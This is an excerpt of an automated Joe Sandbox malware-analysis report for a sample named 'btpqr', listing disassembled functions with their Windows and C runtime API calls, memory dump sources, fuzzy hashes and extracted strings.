                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 40317517d03e6116261dd8d494762f284e116169bc49e2818d3cd3ea17fbdfc3
                                                                                                                        • Instruction ID: 3a3a93bb57438f5bd55cc65b9a62a237aa45d0dbf1e650f9b16c36aba4462076
                                                                                                                        • Opcode Fuzzy Hash: 40317517d03e6116261dd8d494762f284e116169bc49e2818d3cd3ea17fbdfc3
                                                                                                                        • Instruction Fuzzy Hash: F7B09235044208BBCB002BE2ED09B987F68EB09762F008020FA4D44062CB72A4108A99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 004199BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2161030339-0
                                                                                                                        • Opcode ID: 5e4cecfc98cc53a3a6892422d3cb92dfff38b11bbda293255e3a872dd5be84c0
                                                                                                                        • Instruction ID: 5a1de1cafdc0008697065ac5a381ebc7ce82cbc4b2775fe2aff3c161939ace25
                                                                                                                        • Opcode Fuzzy Hash: 5e4cecfc98cc53a3a6892422d3cb92dfff38b11bbda293255e3a872dd5be84c0
                                                                                                                        • Instruction Fuzzy Hash: 3621CF71500286AFDB24DB25DC52BFB73ACEF05354F10407BE90196181E778EDC8CA59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesW.KERNEL32(0040D549,00000001,?,00418F06,00418FA4,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D58B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 1d6b754054052e44161c58cb7c8dbe7ea6468bf69e4b1ae51570ae317ea1b3b0
                                                                                                                        • Instruction ID: 291110986aee6bf67339a771edad720e0197ef73788f133867970fa134a305dd
                                                                                                                        • Opcode Fuzzy Hash: 1d6b754054052e44161c58cb7c8dbe7ea6468bf69e4b1ae51570ae317ea1b3b0
                                                                                                                        • Instruction Fuzzy Hash: A0E04F31640208FFDB21DFD1EC41B563BA4A708714F408025FD085A1A0C371E561CF4D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000000,00000002,?,?,0040DB96,?,?,?,00000002,00000000,00000000,00000000), ref: 0040D5C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: 3bc195a8bf4635b4c8cba13acb32fc5adfee0bc034be291de5d085940ae315d7
                                                                                                                        • Instruction ID: 49326b77fbf81c4d81706873689a40bb40e524c85cd16d374a033b3e6af6e169
                                                                                                                        • Opcode Fuzzy Hash: 3bc195a8bf4635b4c8cba13acb32fc5adfee0bc034be291de5d085940ae315d7
                                                                                                                        • Instruction Fuzzy Hash: 29D01736000108FFCF019FE1EC058AA3BA9FF4C328B804425FD0C56560C676A9209B68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0040B891
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 90d72ffb02b964c9c25c00ea695cecd9db0ea9a22b748caca762a50658afdab6
                                                                                                                        • Instruction ID: 5f84904da837a4ca454253d600cc35636757dca289380c34029062a80d18c87e
                                                                                                                        • Opcode Fuzzy Hash: 90d72ffb02b964c9c25c00ea695cecd9db0ea9a22b748caca762a50658afdab6
                                                                                                                        • Instruction Fuzzy Hash: 09A0113000020CBB8B002B82EE088883FACEA003A0B008020F80C00020CB32A8208A88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction ID: d4cef14c123f318f4dc0708e9886529440e20d988b0dcd3fd24d82b57bf7ab28
                                                                                                                        • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction Fuzzy Hash: 0511C236604129AFD710EF69D8809BAB7E9EF147A47848016FC54CB310E338ED91C768
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction ID: 6b362c47407ed6c6be45d2b5bc4a76b5648cb109d952aba55dc01473114a793a
                                                                                                                        • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction Fuzzy Hash: BCE09A353A8159AFCB00CBA8DC81D25B3F8EF08320B5402D1F825C73A0E738EE00DA54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction ID: 855ab6304ed7df2bf50a7f5d232130ec62c6edd90a5bc1aa0100b227a0869bfa
                                                                                                                        • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction Fuzzy Hash: 35E01A323146249BC7219B5AE800CA6F7E8EF887B0B894466E98997711C224FC2197A4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404153
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040416B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404183
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004041D7
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004041F2
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040420A
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404222
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 3476068407-980797041
                                                                                                                        • Opcode ID: d00e763367ea93f0be7b3ae52dd07dd6286e32095fcc436eda14ceb4681826fe
                                                                                                                        • Instruction ID: faebba4834c9312343b62fe908449e8436bdba343273fae3f362b92bb7ddc594
                                                                                                                        • Opcode Fuzzy Hash: d00e763367ea93f0be7b3ae52dd07dd6286e32095fcc436eda14ceb4681826fe
                                                                                                                        • Instruction Fuzzy Hash: 2431B3B1A4070D6ADB00FAD1C946BEE73A89B10704F90847FFA10B61C3DB7CA5558A1D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040123E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040125E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401279
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA$zU$'
                                                                                                                        • API String ID: 2005118841-1149224613
                                                                                                                        • Opcode ID: 8062bcb29f4417d08298c0f372710fc9734cf30bec9e84d1823aa2fae1ac55af
                                                                                                                        • Instruction ID: 71fe578ee0a6e3aae4d900f27dcf8d7bdfeaccb87f3854a2596ca1d288e3d5d2
                                                                                                                        • Opcode Fuzzy Hash: 8062bcb29f4417d08298c0f372710fc9734cf30bec9e84d1823aa2fae1ac55af
                                                                                                                        • Instruction Fuzzy Hash: 1A517135A006049FDB14DF98C581B99B7B1BF48328F14826EE955BB3E2D739DD41CB48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040123E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040125E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401279
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA$zU$'
                                                                                                                        • API String ID: 2005118841-1149224613
                                                                                                                        • Opcode ID: 2be561de364b7eefec319107a9ca3abfa4839370c43c63d925d5480d9b6ee570
                                                                                                                        • Instruction ID: 7e2b88953ddc59ca7d8290bddf8b6609febcac94ef176fc9cfe302d02423cc65
                                                                                                                        • Opcode Fuzzy Hash: 2be561de364b7eefec319107a9ca3abfa4839370c43c63d925d5480d9b6ee570
                                                                                                                        • Instruction Fuzzy Hash: 1641B035B002058FDB14EFA5C580E99B7B1BF88314B55807EE945BB3A2DB39EC81CB48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040123E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040125E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401279
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA$zU$'
                                                                                                                        • API String ID: 2005118841-1149224613
                                                                                                                        • Opcode ID: 8b184054c13764ae6489e3abd2af32b73df591f376b07da0059868633fdc3d20
                                                                                                                        • Instruction ID: 8945a0e2182e9323a9eb24358aa4de406b6f24654ded4e1b20d67fcb0905d669
                                                                                                                        • Opcode Fuzzy Hash: 8b184054c13764ae6489e3abd2af32b73df591f376b07da0059868633fdc3d20
                                                                                                                        • Instruction Fuzzy Hash: AB217A31A006199FDB14EF95D581B9DB3A4BF04314F5081AEE941BB2A2CB7CE944CB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$__fseeki64
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 1562470337-980797041
                                                                                                                        • Opcode ID: 7b901750c3b006b18403329904b02a95616e29e54c3a72bdd86c7e660e885a2c
                                                                                                                        • Instruction ID: e4afb9887e55f3fd23489c00240b1fa8d03105eb687ddb5a73c9a15f9ade77ce
                                                                                                                        • Opcode Fuzzy Hash: 7b901750c3b006b18403329904b02a95616e29e54c3a72bdd86c7e660e885a2c
                                                                                                                        • Instruction Fuzzy Hash: E8816831600B089FDB24DF58C884AAAB7B4FF04318F54856EE816AB392D779F945CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401FEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        • Opcode ID: 6fdedb41319aa791db9f9b29d7e6246772572c854f65bd17a2f66eccfe1a473f
                                                                                                                        • Instruction ID: 956062587a368471c5f863c4a76f9bb871fd9b18621f19cd0b730673be78f9f1
                                                                                                                        • Opcode Fuzzy Hash: 6fdedb41319aa791db9f9b29d7e6246772572c854f65bd17a2f66eccfe1a473f
                                                                                                                        • Instruction Fuzzy Hash: 5451AE75A002059FDB14DF95C585BAAB7B4BF44308F54806EE615AB3E2CB79E901CB88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402758
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 0040577D
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 0040579D
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 004057B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                                                                                                        • String ID: cgrgtgfg.$LA$dfggttvcle $gghjjjtyty $wqwqwqwqwwqw.$A$A
                                                                                                                        • API String ID: 2823994529-449312905
                                                                                                                        • Opcode ID: 280a997ca19c133a05dd91fbdb11c7472993ca217331701fb57179110291f512
                                                                                                                        • Instruction ID: 200839d03f1d43d7f151bb8e194b470dcd47b605306f3ece7ea85ca2f4278cdc
                                                                                                                        • Opcode Fuzzy Hash: 280a997ca19c133a05dd91fbdb11c7472993ca217331701fb57179110291f512
                                                                                                                        • Instruction Fuzzy Hash: FC51F6756003149BDB54EF55C806B9A7765AF40308F1080BEF9097B2D1DF79AE8ACF8A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040591A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        • Opcode ID: 2f51391e0d331cecd0afc47cd5d54e6b0936c4248778c8fa392301ac8a163122
                                                                                                                        • Instruction ID: f548a48d15b14749fa06765f1a307aefb682e2ca35a4e8faa03297af2b3cfabc
                                                                                                                        • Opcode Fuzzy Hash: 2f51391e0d331cecd0afc47cd5d54e6b0936c4248778c8fa392301ac8a163122
                                                                                                                        • Instruction Fuzzy Hash: 79414B71A00609DFDB00EF99C981F9AB7A4FF04324F54816EE915AB392C778E950CF88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401A75
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: 0A$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
